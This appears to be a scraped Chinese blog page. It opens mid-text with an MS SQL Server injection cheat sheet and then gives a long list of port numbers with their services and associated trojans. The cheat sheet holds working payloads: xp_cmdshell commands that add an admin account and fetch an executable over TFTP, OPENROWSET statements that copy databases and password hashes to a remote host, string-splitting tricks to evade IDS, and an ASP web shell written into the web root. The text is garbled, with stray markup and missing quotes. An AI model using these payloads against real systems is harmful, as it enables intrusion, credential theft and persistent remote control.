SP_blank>_OAMETHOD @shell,run,null, C:WINNTsystem32cmd.exe /c net localgroup administrators jiaoniang$ /add; exec master..xp_blank>_cmdshell tftp -i youip get file.exe– 利用TFTP上传文件;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:;declare @a;set @a=db_blank>_name();backup database @a to disk=你的IP你的共享目录bak.dat如果被限制则可以。select * from openrowset(_blank>sqloledb,server;sa;,select OK! exec master.dbo.sp_blank>_addlogin hax)查询构造:Select * FROM news Where id=… AND topic=… AND …..adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>select 123;–;use master;–:a or name like fff%;– 显示有一个叫ffff的用户哈。and 1<>(select count(email) from [user]);–;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;–;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;–;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;–;update [users] set email=(select top 1 count(id) from password) where name=ffff;–;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;–;update [users] set email=(select top 1 name from password where id=2) where name=ffff;–上面的语句是得到_blank>数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。通过查看ffff的用户资料可得第一个用表叫ad然后根据表名 ad得到这个表的ID 得到第二个表的名字insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)–insert into users values( 667,123,123,0xffff)–insert into users values ( 123, admin–, password, 0xffff)–;and user>0;and (select count(*) from sysobjects)>0;and (select count(*) from mysysobjects)>0 //为access_blank>数据库枚举出数据表名;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);–这是将第一个表名更新到aaa的字段处。读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);–然后id=1552 and exists(select * from aaa where aaa>5)读出第二个表,一个个的读出,直到没有为止。读字段是这样:;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),1));–然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),2));–然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名获得数据表名update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)通过SQLSERVER注入_blank>漏洞建_blank>数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]获得数据表字段名update 表名 set 字段=(select top 1 col_blank>_name(object_blank>_id(要查询的数据表名),字段列如:1) [ where 条件]绕过IDS的检测[使用变量];declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:1、 开启远程_blank>数据库基本语法select from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select from table1 )参数: (1) OLEDB Provider name2、 其中连接字符串参数可以是任何端口用来连接,比如select from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select from table3.复制目标主机的整个_blank>数据库insert所有远程表到本地表。基本语法:insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select from table1) select from table2这行语句将目标主机上table2表中的所有数据复制到远程_blank>数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select from table1) select from table2insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysdatabases)select * from master.dbo.sysdatabasesinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysobjects)select * from user_blank>_database.dbo.sysobjectsinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_syscolumns)select * from user_blank>_database.dbo.syscolumns复制_blank>数据库:insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select from table1) select from database..table1insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select from table2) select from database..table2复制哈西表(HASH)登录_blank>密码的hash存储于sysxlogins中。方法如下:insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select from _blank>_sysxlogins) select from database.dbo.sysxlogins得到hash之后,就可以进行暴力破解。遍历目录的方法: 先创建一个临时表:temp;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–;insert temp exec master.dbo.xp_blank>_availablemedia;– 获得当前所有驱动器;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:;– 获得子目录列表;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:;– 获得所有子目录的目录树结构,并寸入temp表中;insert into temp(id) exec master.dbo.xp_blank>_cmdshell type c:webindex.asp;– 查看某个文件的内容;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:;–;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c: *.asp /s/a;–;insert into temp(id) exec master.dbo.xp_blank>_cmdshell cscript C:InetpubAdminScriptsadsutil.vbs enum w3svc;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:;– (xp_blank>_dirtree适用权限PUBLIC)写入表:语句1:and 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin));–语句2:and 1=(Select IS_blank>_SRVROLEMEMBER(serveradmin));–语句3:and 1=(Select IS_blank>_SRVROLEMEMBER(setupadmin));–语句4:and 1=(Select IS_blank>_SRVROLEMEMBER(securityadmin));–语句5:and 1=(Select IS_blank>_SRVROLEMEMBER(securityadmin));–语句6:and 1=(Select IS_blank>_SRVROLEMEMBER(diskadmin));–语句7:and 1=(Select IS_blank>_SRVROLEMEMBER(bulkadmin));–语句8:and 1=(Select IS_blank>_SRVROLEMEMBER(bulkadmin));–语句9:and 1=(Select IS_blank>_MEMBER(db_blank>_owner));–把路径写到表中去:;create table dirs(paths varchar(100), id int)–;insert dirs exec master.dbo.xp_blank>_dirtree c:–and 0<>(select top 1 paths from dirs)–and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))–;create table dirs1(paths varchar(100), id int)–;insert dirs exec master.dbo.xp_blank>_dirtree e:web–and 0<>(select top 1 paths from dirs1)–把_blank>数据库备份到网页目录:下载;declare @a sysname; set @a=db_blank>_name();backup database @a to disk=e:webdown.bak;–and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) 参看相关表。and 1=(select user_blank>_id from USER_blank>_LOGIN)and 0=(select user from USER_blank>_LOGIN where user>1)-=- wscript.shell example -=-declare @o intexec sp_blank>_oacreate wscript.shell, @o outexec sp_blank>_oamethod @o, run, NULL, notepad.exe; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe–declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_blank>_oacreate scripting.filesystemobject, @o outexec sp_blank>_oamethod @o, opentextfile, @f out, c:boot.ini, 1exec @ret = sp_blank>_oamethod @f, readline, @line outwhile( @ret = 0 )beginprint @lineexec @ret = sp_blank>_oamethod @f, readline, @line outenddeclare @o int, @f int, @t int, @ret intexec sp_blank>_oacreate scripting.filesystemobject, @o outexec sp_blank>_oamethod @o, createtextfile, @f out, c:inetpubwwwrootfoo.asp, 1exec @ret = sp_blank>_oamethod @f, writeline, NULL,<% set o = server.createobject(“wscript.shell”): o.run( request.querystring(“cmd”) ) %>declare @o int, @ret intexec sp_blank>_oacreate speech.voicetext, @o outexec sp_blank>_oamethod @o, register, NULL, foo, barexec sp_blank>_oasetproperty @o, speed, 150exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528waitfor delay 00:00:05; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05–xp_blank>_dirtree适用权限PUBLICexec master.dbo.xp_blank>_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。create table dirs(paths varchar(100), id int)建表,这里建的表是和上面 xp_blank>_dirtree相关连,字段相等、类型相同。insert dirs exec master.dbo.xp_blank>_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
2023年02月07日
35 阅读
0 评论
0 点赞
2023-02-07
端口功能
端口大全介绍2端口:管理实用程序3端口:压缩进程5端口:远程作业登录7端口:回显9端口:丢弃11端口:在线用户13端口:时间17端口:每日引用18端口:消息发送协议19端口:字符发生器20端口:FTP文件传输协议(默认数据口)21端口:FTP文件传输协议(控制)22端口:SSH远程登录协议23端口:telnet(终端仿真协议),木马Tiny Telnet Server开放此端口24端口:预留给个人用邮件系统25端口:SMTP服务器所开放的端口,用于发送邮件27端口:NSW 用户系统 FE29端口:MSG ICP31端口:MSG验证,木马Master Paradise、HackersParadise开放此端口33端口:显示支持协议35端口:预留给个人打印机服务37端口:时间38端口:路由访问协议39端口:资源定位协议41端口:图形42端口:主机名服务43端口:who is服务44端口:MPM(消息处理模块)标志协议45端口:消息处理模块46端口:消息处理模块(默认发送口)47端口:NI FTP48端口:数码音频后台服务49端口:TACACS登录主机协议50端口:远程邮件检查协议51端口:IMP(接口信息处理机)逻辑地址维护52端口:施乐网络服务系统时间协议53端口:dns域名服务器54端口:施乐网络服务系统票据交换55端口:ISI图形语言56端口:施乐网络服务系统验证57端口:预留个人用终端访问58端口:施乐网络服务系统邮件59端口:预留个人文件服务60端口:未定义61端口:NI邮件62端口:异步通讯适配器服务63端口:whois++64端口:通讯接口65端口:TACACS数据库服务66端口:Oracle SQL*NET67端口:引导程序协议服务端68端口:引导程序协议客户端69端口:小型文件传输协议70端口:信息检索协议71端口:远程作业服务72端口:远程作业服务73端口:远程作业服务74端口:远程作业服务75端口:预留给个人拨出服务76端口:分布式外部对象存储77端口:预留给个人远程作业输入服务78端口:修正TCP79端口:查询远程主机在线用户等信息80端口:http,用于网页浏览,木马Executor开放此端口81端口:HOST2名称服务82端口:传输实用程序83端口:模块化智能终端ML设备84端口:公用追踪设备85端口:模块化智能终端ML设备86端口:Micro Focus Cobol编程语言87端口:预留给个人终端连接88端口:Kerberros安全认证系统89端口:SU/MIT telnet(终端仿真网关)90端口:DNSIX 安全属性标记图91端口:MIT Dover假脱机92端口:网络打印协议93端口:设备控制协议94端口:Tivoli对象调度96端口:DIXIE协议规范97端口:快速远程虚拟文件协议98端口:TAC新闻协议99端口:后门程序ncx99开放此端口100端口:未知用途101端口:NIC 主机名称服务102端口:消息传输代理103端口:Genesis 点对点传输网络105端口:信箱名称服务106端口:3COM-TSMUX开放端口107端口:远程Telnet服务108端口:SNA 网关访问服务109端口:POP2服务器开放此端口,用于接收邮件110端口:POP3服务器开放此端口,用于接收邮件111端口:SUN公司的RPC服务所有端口112端口:McIDAS 数据传输协议113端口:认证服务,用于鉴别TCP连接的用户114端口:音频新闻多点服务115端口:简单文件传输服务116端口:ANSA REX 通知117端口:UUCP 路径服务118端口:SQL 服务119端口:NEWS新闻组传输协议,承载USENET通信121端口:木马BO jammerkillahV开放端口122端口:SMAKY网络123端口:网络时间协议,蠕虫病毒会利用,一般关闭128端口:GSS X许可认证129端口:密码生成器协议130端口:Cisco软件开放端口131端口:Cisco软件开放端口132端口:Cisco软件开放端口133端口:统计服务134端口:INGRES-网络服务135端口:DCOM服务,冲击波病毒利用,不能关闭136端口:命名系统137端口:NETBIOS协议应用,为共享开放138端口:NETBIOS协议应用,为共享开放139端口:NETBIOS协议应用,为共享开放140端口:EMFIS数据服务141端口:EMFIS控制服务143端口:Interim邮件访问协议144端口:UMA软件开放端口145端口:UAAC协议149端口:AED 512仿真服务150端口:SQL(结构化查询语言)-网络152端口:后台文件传输协议156端口:SQL(结构化查询语言)服务158端口:PC邮件服务器159端口:NSS-路由160端口:SGMP-陷阱161端口:简单网络管理协议162端口:SNMP陷阱163端口:CMIP/TCP 管理164端口:CMIP/TCP 代理166端口:Sirius系统169端口:发送170端口:网络附言177端口:x显示管理控制协议,入侵者通过它访问X-windows操作台178端口:NextStep Window 服务179端口:边界网关协议180端口:图表181端口:统一184端口:OC服务器185端口:远程-KIS186端口:KIS 协议187端口:应用通信接口189端口:队列文件传输190端口:网关进入控制协议191端口:Prospero 目录服务192端口:OSU 网络监视系统193端口:Spider 远程控制协议194端口:多线交谈协议197端口:目录地址服务198端口:目录地址服务监视器200端口:IBM系统资源控制器201端口:AppleTalk(Mac机所用的网络协议)路由保证202端口:AppleTalk(Mac机所用的网络协议)Name Binding203端口:AppleTalk(Mac机所用的网络协议)未用端口204端口:AppleTalk(Mac机所用的网络协议)回显205端口:AppleTalk(Mac机所用的网络协议)未用端口206端口:AppleTalk(Mac机所用的网络协议)区信息207端口:AppleTalk(Mac机所用的网络协议)未用端口208端口:AppleTalk(Mac机所用的网络协议)未用端口209端口:快速邮件传输协议210端口:ANSI(美国国家标准协会)Z39.50211端口:Texas Instruments 914C/G终端213端口:IPX(以太网所用的协议)218端口:Netix消息记录协议219端口:Unisys ARPs220端口:交互邮件访问协议 v3223端口:证书分发中心224端口:masq拨号器241端口:预留端口 (224-241)245端口:链接246端口:显示系统协议257端口:安全电子交易系统258端口:Yak Winsock 个人聊天259端口:有效短程遥控260端口:开放端口261端口:IIOP 基于TLS/SSL的命名服务266端口:SCSI(小型计算机系统接口)on ST267端口:Tobit David服务层268端口:Tobit David复制281端口:个人连结282端口:Cable端口A/X286端口:FXP通信308端口:Novastor备份313端口:Magenta逻辑318端口:PKIX时间标记333端口:Texar安全端口344端口:Prospero数据存取协议345端口:Perf分析工作台346端口:Zebra服务器347端口:Fatmen服务器348端口:Cabletron管理协议358端口:Shrink可上网家电协议359端口:网络安全风险管理协议362端口:SRS发送363端口:RSVP隧道372端口:列表处理373端口:Legend公司374端口:Legend公司376端口:AmigaEnvoy网络查询协议377端口:NEC公司378端口:NEC公司379端口:TIA/EIA/IS-99调制解调器客户端380端口:TIA/EIA/IS-99调制解调器服务器381端口:hp(惠普)性能数据收集器382端口:hp(惠普)性能数据控制节点383端口:hp(惠普)性能数据警报管理384端口:远程网络服务器系统385端口:IBM应用程序386端口:ASA信息路由器定义文件.387端口:Appletalk更新路由.389端口:轻型目录访问协议395端口:网络监视控制协议396端口:Novell(美国Novell公司)Netware(Novell公司出的网络操作系统)over IP400端口:工作站解决方案401端口:持续电源402端口:Genie协议406端口:交互式邮件支持协议408端口:Prospero资源管理程序409端口:Prospero资源节点管理.410端口:DEC(数据设备公司)远程调试协议411端口:远程MT协议412端口:陷阱协定端口413端口:存储管理服务协议414端口:信息查询415端口:B网络423端口:IBM操作计划和控制开端424端口:IBM操作计划和控制追踪425端口:智能计算机辅助设计427端口:服务起位置434端口:移动ip代理435端口:移动ip管理443端口:基于TLS/SSL的网页浏览端口,能提供加密和通过安全端口传输的另一种HTTP444端口:简单网络内存分页协议445端口:Microsoft-DS,为共享开放,震荡波病毒利用,一般应关闭446端口:DDM-远程关系数据库访问447端口:DDM-分布式文件管理448端口:DDM-使用安全访问远程数据库456端口:木马HACKERS PARADISE开放此端口458端口:apple quick time软件开放端口459端口:ampr-rcmd命令464端口:k密码服务469端口:广播控制协议470端口:scx-代理472端口:ljk-登陆481端口:Ph服务487端口:简单异步文件传输489端口:nest-协议491端口:go-登陆499端口:ISO ILL协议500端口:Internet密钥交换,Lsass开放端口,不能关闭509端口:陷阱510端口:FirstClass协议512端口:远程进程执行513端口:远程登陆514端口:cmd命令515端口:spooler516端口:可视化数据518端口:交谈519端口:unix时间520端口:扩展文件名称服务器525端口:时间服务526端口:新日期529端口:在线聊天系统服务530端口:远程过程调用531端口:聊天532端口:读新闻533端口:紧急广播端口534端口:MegaMedia管理端537端口:网络流媒体协议542端口:商业543端口:Kerberos(软件)v4/v5544端口:krcmd命令546端口:DHCPv6 客户端547端口:DHCPv6 服务器552端口:设备共享554端口:Real Time Stream控制协议555端口:木马PhAse1.0、Stealth Spy、IniKiller开放此端口556端口:远距离文件服务器563端口:基于TLS/SSL的网络新闻传输协议564端口:plan 9文件服务565端口:whoami查询566端口:streettalk567端口:banyan-rpc(远程过程调用)568端口:DPA成员资格569端口:MSN成员资格570端口:demon(调试监督程序)571端口:udemon(调试监督程序)572端口:声纳573端口:banyan-贵宾574端口:FTP软件代理系统581端口:Bundle Discovery 协议582端口:SCC安全583端口:Philips视频会议584端口:密钥服务器585端口:IMAP4+SSL (Use 993 instead)586端口:密码更改587端口:申请589端口:Eye连结595端口:CAB协议597端口:PTC名称服务598端口:SCO网络服务器管理3599端口:Aeolon Core协议600端口:Sun IPC(进程间通讯)服务器601端口:可靠系统登陆服务604端口:通道606端口:Cray统一资源管理608端口:发送人-传递/提供 文件传输器609端口:npmp-陷阱610端口:npmp-本地611端口:npmp-gui( 图形用户界面)612端口:HMMP指引613端口:HMMP操作614端口:SSL(加密套接字协议层)shell(壳)615端口:Internet配置管理616端口:SCO(Unix系统)系统管理服务器617端口:SCO桌面管理服务器619端口:Compaq(康柏公司)EVM620端口:SCO服务器管理623端口:ASF远程管理控制协议624端口:Crypto管理631端口:IPP (Internet打印协议)633端口:服务更新(Sterling软件)637端口:局域网服务器641端口:repcmd命令647端口:DHCP(动态主机配置协议)Failover648端口:注册登记协议(RRP)649端口:Cadview-3d软件协议666端口:木马Attack FTP、Satanz Backdoor开放此端口808端口:ccproxy http/gopher/ftp (over http)协议1001端口:木马Silencer,WebEx开放端口1011端口:木马Doly开放端口1024端口:动态端口的开始,木马yai开放端口1025端口:inetinfo.exe(互联网信息服务)木马netspy开放端口1026端口:inetinfo.exe(互联网信息服务)1027端口:应用层网关服务1030端口:应用层网关服务1031端口:BBN IAD1033端口:本地网络信息端口1034端口:同步通知1036端口:安全部分传输协议1070端口:木马Psyber Stream,Streaming Audio开放端口1071端口:网络服务开放端口1074端口:网络服务开放端口1080端口:Socks这一协议以通道方式穿过防火墙,允许防火墙后面的人通过一个IP地址访问INTERNET1110端口:卡巴斯基反病毒软件开放此端口1125端口:卡巴斯基反病毒软件开放此端口1203端口:许可证生效端口1204端口:登陆请求监听端口1206端口:Anthony数据端口1222端口:SNI R&D网络端口1233端口:普遍的附录服务器端口1234端口:木马SubSeven2.0、Ultors Trojan开放此端口1243端口:木马SubSeven1.0/1.9开放此端口1245端口:木马Vodoo,GabanBus,NetBus,Vodoo开放此端口1273端口:EMC-网关端口1289端口:JWalk服务器端口1290端口:WinJa服务器端口1333端口:密码策略(网络服务)(svchost.exe)1334端口:网络服务(svchost.exe)1335端口:数字公正协议1336端口:即时聊天协议(svchost.exe)1349端口:注册网络协议端口1350端口:注册网络协议端口1371端口:富士通配置协议端口1372端口:富士通配置协议端口1374端口:EPI软件系统端口1376端口:IBM个人-个人软件端口1377端口:Cichlid许可证管理端口1378端口:Elan许可证管理端口1380端口:Telesis网络许可证管理端口1381端口:苹果网络许可证管理端口1386端口:CheckSum 许可证管理端口1387端口:系统开放端口(rundll32.exe)1388端口:数据库高速缓存端口1389端口:文档管理端口1390端口:存储控制器端口1391端口:存储器存取服务器端口1392端口:打印管理端口1393端口:网络登陆服务器端口1394端口:网络登陆客户端端口1395端口:PC工作站管理软件端口1396端口:DVL活跃邮件端口1397端口:音频活跃邮件端口1398端口:视频活跃邮件端口1399端口:Cadkey许可证管理端口1433端口:Microsoft的SQL服务开放端口1434端口:Microsoft的SQL服务监视端口1492端口:木马FTP99CMP开放此端口1509端口:木马Psyber Streaming Server开放此端口1512端口:Microsoft Windows网络名称服务1524端口:许多攻击脚本安装一个后门SHELL于这个端口1600端口:木马Shivka-Burka开放此端口1645端口:远程认证拨号用户服务1701端口:第2层隧道协议1731端口:NetMeeting音频调用控制1801端口:Microsoft消息队列服务器1807端口:木马SpySender开放此端口1900端口:可被利用ddos攻击,一般关闭1912端口:金山词霸开放此端口1981端口:木马ShockRave开放此端口1999端口:木马BackDoor,yai开放此端口2000端口:木马GirlFriend 1.3、Millenium 1.0开放此端口2001端口:木马Millenium 1.0、Trojan Cow,黑洞2001开放此端口2003端口:GNU 查询2023端口:木马Pass Ripper开放此端口2049端口:NFS程序常运行于此端口2115端口:木马Bugs开放此端口2140端口:木马Deep Throat 1.0/3.0,The Invasor开放此端口2500端口:应用固定端口会话复制的RPC客户2504端口:网络平衡负荷2565端口:木马Striker开放此端口2583端口:木马Wincrash 2.0开放此端口2801端口:木马Phineas Phucker开放此端口2847端口:诺顿反病毒服务开放此端口3024端口:木马WinCrash开放此端口3128端口:squid http代理服务器开放此端口3129端口:木马Master Paradise开放此端口3150端口:木马The Invasor,deep throat开放此端口3210端口:木马SchoolBus开放此端口3306端口:MySQL开放此端口3333端口:木马Prosiak开放此端口3389端口:WINDOWS 2000终端开放此端口3456端口:inetinfo.exe(互联网信息服务)开放端口,VAT默认数据3457端口:VAT默认控制3527端口:Microsoft消息队列服务器3700端口:木马Portal of Doom开放此端口3996端口:木马RemoteAnything开放此端口4000端口:腾讯QQ客户端开放此端口4060端口:木马RemoteAnything开放此端口4092端口:木马WinCrash开放此端口4133端口:NUTS Bootp服务器4134端口:NIFTY-Serve HMI协议4141端口:Workflow服务器4142端口:文档服务器4143端口:文档复制4145端口:VVR控制4321端口:远程Who Is查询4333端口:微型sql服务器4349端口:文件系统端口记录4350端口:网络设备4351端口:PLCY网络服务4453端口:NSS警报管理4454端口:NSS代理管理4455端口:PR聊天用户4456端口:PR聊天服务器4457端口:PR注册4480端口:Proxy+ HTTP代理端口4500端口:Lsass开放端口,不能关闭4547端口:Lanner许可管理4555端口:RSIP端口4590端口:木马ICQTrojan开放此端口4672端口:远程文件访问服务器4752端口:简单网络音频服务器4800端口:Icona快速消息系统4801端口:Icona网络聊天4802端口:Icona许可系统服务器4848端口:App服务器-Admin HTTP4849端口:App服务器-Admin HTTPS4950端口:木马IcqTrojan开放5000端口5000端口:木马blazer5,Sockets de Troie开放5000端口,一般应关闭5001端口:木马Sockets de Troie开放5001端口5006端口:wsm服务器5007端口:wsm服务器ssl5022端口:mice服务器5050端口:多媒体会议控制协议5051端口:ITA代理5052端口:ITA管理5137端口:MyCTS服务器端口5150端口:Ascend通道管理协议5154端口:BZFlag游戏服务器5190端口:America-Online(美国在线)5191端口:AmericaOnline1(美国在线)5192端口:AmericaOnline2(美国在线)5193端口:AmericaOnline3(美国在线)5222端口:Jabber客户端连接5225端口:HP(惠普公司)服务器5226端口:HP(惠普公司)5232端口:SGI绘图软件端口5250端口:i网关5264端口:3Com网络端口15265端口:3Com网络端口25269端口:Jabber服务器连接5306端口:Sun MC组5321端口:木马Sockets de Troie开放5321端口5400端口:木马Blade Runner开放此端口5401端口:木马Blade Runner开放此端口5402端口:木马Blade Runner开放此端口5405端口:网络支持5409端口:Salient数据服务器5410端口:Salient用户管理5415端口:NS服务器5416端口:SNS网关5417端口:SNS代理5421端口:网络支持25423端口:虚拟用户5427端口:SCO-PEER-TTA(Unix系统)5432端口:PostgreSQL数据库5550端口:木马xtcp开放此端口5569端口:木马Robo-Hack开放此端口5599端口:公司远程安全安装5600端口:公司安全管理5601端口:公司安全代理5631端口:pcANYWHERE(软件)数据5632端口:pcANYWHERE(软件)数据5673端口:JACL消息服务器5675端口:V5UA应用端口5676端口:RA管理5678端口:远程复制代理连接5679端口:直接电缆连接5720端口:MS-执照5729端口:Openmail用户代理层5730端口:Steltor's日历访问5731端口:netscape(网景)suiteware5732端口:netscape(网景)suiteware5742端口:木马WinCrash1.03开放此端口5745端口:fcopy-服务器5746端口:fcopys-服务器5755端口:OpenMail(邮件服务器)桌面网关服务器5757端口:OpenMail(邮件服务器)X.500目录服务器5766端口:OpenMail (邮件服务器)NewMail服务器5767端口:OpenMail (邮件服务器)请求代理曾(安全)5768端口:OpenMail(邮件服务器) CMTS服务器5777端口:DALI端口5800端口:虚拟网络计算5801端口:虚拟网络计算5802端口:虚拟网络计算HTTP访问, d5803端口:虚拟网络计算HTTP访问, d5900端口:虚拟网络计算机显示05901端口:虚拟网络计算机显示15902端口:虚拟网络计算机显示25903端口:虚拟网络计算机显示36000端口:X Window 系统6001端口:X Window 服务器6002端口:X Window 服务器6003端口:X Window 服务器6004端口:X Window 服务器6005端口:X Window 服务器6006端口:X Window 服务器6007端口:X Window 服务器6008端口:X Window 服务器6009端口:X Window 服务器6456端口:SKIP证书发送6471端口:LVision许可管理器6505端口:BoKS管理私人端口6506端口:BoKS管理公共端口6507端口:BoKS Dir服务器,私人端口6508端口:BoKS Dir服务器,公共端口6509端口:MGCS-MFP端口6510端口:MCER端口6566端口:SANE控制端口6580端口:Parsec主服务器6581端口:Parsec对等网络6582端口:Parsec游戏服务器6588端口:AnalogX HTTP代理端口6631端口:Mitchell电信主机6667端口:Internet多线交谈6668端口:Internet多线交谈6670端口:木马Deep Throat开放此端口6671端口:木马Deep Throat 3.0开放此端口6699端口:Napster文件(MP3)共享服务6701端口:KTI/ICAD名称服务器6788端口:SMC软件-HTTP6789端口:SMC软件-HTTPS6841端口:Netmo软件默认开放端口6842端口:Netmo HTTP服务6883端口:木马DeltaSource开放此端口6939端口:木马Indoctrination开放此端口6969端口:木马Gatecrasher、Priority开放此端口6970端口:real音频开放此端口7000端口:木马Remote Grab开放此端口7002端口:使用者& 组 数据库7003端口:音量定位数据库7004端口:AFS/Kerberos认证服务7005端口:音量管理服务7006端口:错误解释服务7007端口:Basic监督进程7008端口:服务器-服务器更新程序7009端口:远程缓存管理服务7011端口:Talon软件发现端口7012端口:Talon软件引擎7013端口:Microtalon发现7014端口:Microtalon通信7015端口:Talon网络服务器7020端口:DP服务7021端口:DP服务管理7100端口:X字型服务7121端口:虚拟原型许可证管理7300端口:木马NetMonitor开放此端口7301端口:木马NetMonitor开放此端口7306端口:木马NetMonitor,NetSpy1.0开放此端口7307端口:木马NetMonitor开放此端口7308端口:木马NetMonitor开放此端口7323端口:Sygate服务器端7511端口:木马聪明基因开放此端口7588端口:Sun许可证管理7597端口:木马Quaz开放此端口7626端口:木马冰河开放此端口7633端口:PMDF管理7674端口:iMQ SSL通道7675端口:iMQ通道7676端口:木马Giscier开放此端口7720端口:Med图象入口7743端口:Sakura脚本传递协议7789端口:木马ICKiller开放此端口7797端口:Propel连接器端口7798端口:Propel编码器端口8000端口:腾讯QQ服务器端开放此端口8001端口:VCOM通道8007端口:Apache(类似iis)jServ协议1.x8008端口:HTTP Alternate8009端口:Apache(类似iis)JServ协议1.38010端口:Wingate代理开放此端口8011端口:木马way2.4开放此端口8022端口:OA-系统8080端口:WWW代理开放此端口8081端口:ICECap控制台8082端口:BlackIce(防止黑客软件)警报发送到此端口8118端口:Privoxy HTTP代理8121端口:Apollo数据端口8122端口:Apollo软件管理端口8181端口:Imail8225端口:木马灰鸽子开放此端口8311端口:木马初恋情人开放此端口8351端口:服务器寻找8416端口:eSpeech Session协议8417端口:eSpeech RTP协议8473端口:虚拟点对点8668端口:网络地址转换8786端口:Message客户端8787端口:Message服务器8954端口:Cumulus管理端口9000端口:CS监听9001端口:ETL服务管理9002端口:动态id验证9021端口:Pangolin验证9022端口:PrivateArk远程代理9023端口:安全网络登陆-19024端口:安全网络登陆-29025端口:安全网络登陆-39026端口:安全网络登陆-49101端口:Bacula控制器9102端口:Bacula文件后台9103端口:Bacula存储邮件后台9111端口:DragonIDS控制台9217端口:FSC通讯端口9281端口:软件传送端口19282端口:软件传送端口29346端口:C技术监听9400端口:木马Incommand 1.0开放此端口9401端口:木马Incommand 1.0开放此端口9402端口:木马Incommand 1.0开放此端口9594端口:信息系统9595端口:Ping Discovery服务9800端口:WebDav源端口9801端口:Sakura脚本转移协议-29802端口:WebDAV Source TLS/SSL9872端口:木马Portal of Doom开放此端口9873端口:木马Portal of Doom开放此端口9874端口:木马Portal of Doom开放此端口9875端口:木马Portal of Doom开放此端口9899端口:木马InIkiller开放此端口9909端口:域名时间9911端口:SYPECom传送协议9989端口:木马iNi-Killer开放此端口9990端口:OSM Applet程序服务器9991端口:OSM事件服务器10000端口:网络数据管理协议10001端口:SCP构造端口10005端口:安全远程登陆10008端口:Octopus多路器10067端口:木马iNi-Killer开放此端口10113端口:NetIQ端点10115端口:NetIQ端点10116端口:NetIQVoIP鉴定器10167端口:木马iNi-Killer开放此端口11000端口:木马SennaSpy开放此端口11113端口:金山词霸开放此端口11233端口:木马Progenic trojan开放此端口12076端口:木马Telecommando开放此端口12223端口:木马Hack'99 KeyLogger开放此端口12345端口:木马NetBus1.60/1.70、GabanBus开放此端口12346端口:木马NetBus1.60/1.70、GabanBus开放此端口12361端口:木马Whack-a-mole开放此端口13223端口:PowWow 客户端,是Tribal Voice的聊天程序13224端口:PowWow 服务器,是Tribal Voice的聊天程序16959端口:木马Subseven开放此端口16969端口:木马Priority开放此端口17027端口:外向连接19191端口:木马蓝色火焰开放此端口20000端口:木马Millennium开放此端口20001端口:木马Millennium开放此端口20034端口:木马NetBus 